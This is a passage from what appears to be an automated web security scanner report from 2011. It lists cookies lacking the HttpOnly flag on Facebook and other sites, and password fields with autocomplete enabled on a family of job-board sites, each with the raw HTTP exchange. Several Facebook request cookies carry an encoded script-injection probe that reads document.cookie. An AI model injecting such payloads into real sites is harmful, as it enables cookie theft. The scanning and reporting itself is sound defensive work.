Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:38 GMT
Content-Length: 21078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.439. http://www.facebook.com/pages/JD2B/298408284363

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/JD2B/298408284363

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/JD2B/298408284363 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=jal5o; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:30 GMT
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.440. http://www.facebook.com/piyush.v.bhatt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /piyush.v.bhatt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /piyush.v.bhatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=WABbM; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:40 GMT
Content-Length: 20984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.441. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=pcnfa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:32 GMT
Content-Length: 0


10.442. http://www.facebook.com/yahoonews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /yahoonews

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=A3j8b; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 18:30:09 GMT
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.443. https://www.lowermybills.com/lending/home-refinance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowermybills.com
Path:   /lending/home-refinance/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:22 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"1447-1295483253000"
Last-Modified: Thu, 20 Jan 2011 00:27:33 GMT
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

<html>
<head>
<title></title>
<script type="text/javascript" language="javascript">
var userInfo = {
urlParams: {
jsEnabled: "Y",
resolution: "",

...[SNIP]...

10.444. http://www.omniture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:41:23 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

10.445. http://www.toyotafinancial.com/consumer/tfs.portal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=jc98N5JMXvLLjLZFlFRQcc3KJbJlSv4lvpbgGG4LTpMJ6ZqH1DQL!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...

10.446. http://www.velaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vinson+elkins
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:24:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><sc
...[SNIP]...

11. Password field with autocomplete enabled
There are 138 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. http://www.100kcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.100kcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.2. http://www.accountingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.3. http://www.accountmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.4. http://www.actuarialcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.actuarialcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.5. http://www.admincrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.admincrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.6. http://www.advertisingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.advertisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.7. http://www.aerospacecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
